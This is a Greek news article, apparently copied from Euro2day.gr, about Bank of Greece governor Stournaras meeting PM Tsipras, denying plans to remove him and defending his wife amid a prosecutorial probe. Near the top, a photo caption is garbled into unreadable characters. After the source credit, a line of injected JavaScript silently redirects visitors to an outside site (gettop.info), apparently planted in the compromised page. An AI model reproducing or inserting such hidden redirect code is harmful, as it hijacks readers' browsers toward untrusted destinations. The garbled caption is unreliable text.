Στουρνάρας μετά από συνάντηση με Τσίπρα: Δεν υπάρχει σχέδιο εκπαραθύρωσης μου (BINTEO)

0
2
m᷾񧳧 �հﵱ㯽 頻ﭯ쩪�霭�Ӵﵱ휱ᠨ�㱡� ꡩ �᭡𫧱�񞳴ﵠӴẪアᠡ𼠴ݣᱯ ̡ﵬ쥴ܠ�﫯꫞񹳧 �󵭜�󧲠�б���筠�ꡬН찴砵 ɯ��12 (EUROKINISSI-ԁԉM`̐ϋQǩ

 

 Υπάρχει πόρισμα του SSΜ και της ΤτΕ για δάνεια που παραχώρησε η Τράπεζας Αττικής για ένα αρκετά μεγάλο διάστημα το οποίο και θα σταλεί τις επόμενες ημέρες στην Εισαγγελία, δήλωσε ο Γιάννης Στουρνάρας μετά τη συνάντηση που είχε με τον Αλέξη Τσίπρα.

Ο διοικητής της Τράπεζας της Ελλάδος απαντώντας σε σχετική ερώτηση τόνισε πως «δεν υπάρχει σχέδιο εκπαραθύρωσής μου από την Τράπεζα της Ελλάδος».

Είχαμε μια πολύ καλή συζήτηση με τον πρωθυπουργό για τις τράπεζες και την οικονομία, ανέφερε ο ίδιος, συμπληρώνοντας πως δεν υπήρξε ποτέ πρόβλημα στις σχέσεις της ΤτE με την κυβέρνηση.

Σε ό,τι αφορά την υπόθεση της συζύγου του υπογράμμισε «η σύζυγός μου, με την οποία ζω 40 χρόνια, αισίως φέτος συμπληρώσαμε 40 χρόνια, θα μπορούσα να σας διαβεβαιώσω ότι είναι το πιο έντιμο ειλικρινές, δημιουργικό και στοργικό άτομο που υπάρχει στον πλανήτη αυτό. Έχει σπιλωθεί εδώ και πολύ καιρό με την ιστορία αυτή, υπερασπίζεται τον εαυτό της μονή της, με τον ικανό συνήγορό της, και θα συνεχίσει να το κάνει».

Έχει την άμεση συμπαράστασή μου σημείωσε, ενώ τόνισε ότι «αυτό δεν μπορεί να βάλει σκιές στις σχέσεις της ΤτE με την κυβέρνηση. Η σύζυγός μου έχει απόλυτη εμπιστοσύνη στην Δικαιοσύνη και θα χειριστεί το θέμα αυτό μόνη της», είπε.

Ερωτηθείς για τη διάσταση που δίνουν στην υπόθεση της εισαγγελικής έρευνας στην, εταιρεία της συζύγου του οι Financial Times o διοικητής της ΤτΕ  είπε ότι η σύζυγός του έχει κάνει δήλωση, και ο συνήγορός της έχει κάνει δήλωση χθες, και μίλησε για ατυχείς δικονομικές ανωμαλίες οι οποίες διερευνώνται.

Κυβερνητική πηγή: Η δικαιοσύνη είναι ανεξάρτητη και κάνει τη δουλειά της

Από την πλευρά της κυβερνητική πηγή μετά το πέρας της συνάντησης τόνισε ότι «η δικαιοσύνη είναι ανεξάρτητη και κάνει τη δουλειά της. Κανένας δεν μπορεί και δεν δικαιούται να παρέμβει στο έργο της».

«Όπως δήλωσε και ο διοικητής καμία σκιά δεν υπάρχει, ούτε υπήρξε στη θεσμική σχέση της κυβέρνησης με την Τράπεζα της Ελλάδος», ανέφερε η ίδια πηγή.

«Εργαζόμαστε για την εύρυθμη λειτουργία του τραπεζικού συστήματος, σε μια φάση που αρχίζουν και εμφανίζονται θετικά σημάδια, όπως η μείωση των κόκκινων δανείων, η σταδιακή επιστροφή καταθέσεων και υπάρχουν σαφείς ενδείξεις ανάκαμψης της οικονομίας» ανέφερε.

Σύμφωνα με πληροφορίες, ο πρωθυπουργός, κατά τη διάρκεια της συνάντησης που είχε με τον κ. Στουρνάρα, υπογράμμισε στον διοικητή της Τράπεζας της Ελλάδος τη σημασία που αποδίδει η κυβέρνηση στον ανεξάρτητο ρόλο του διοικητή της κεντρικής τράπεζας της Ελλάδας, καθώς και στο ότι δεν πρέπει να δημιουργούνται σκιές στη θεσμική συνεργασία ανάμεσα στα δύο μέρη.

 

Πηγή: Euro2day.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here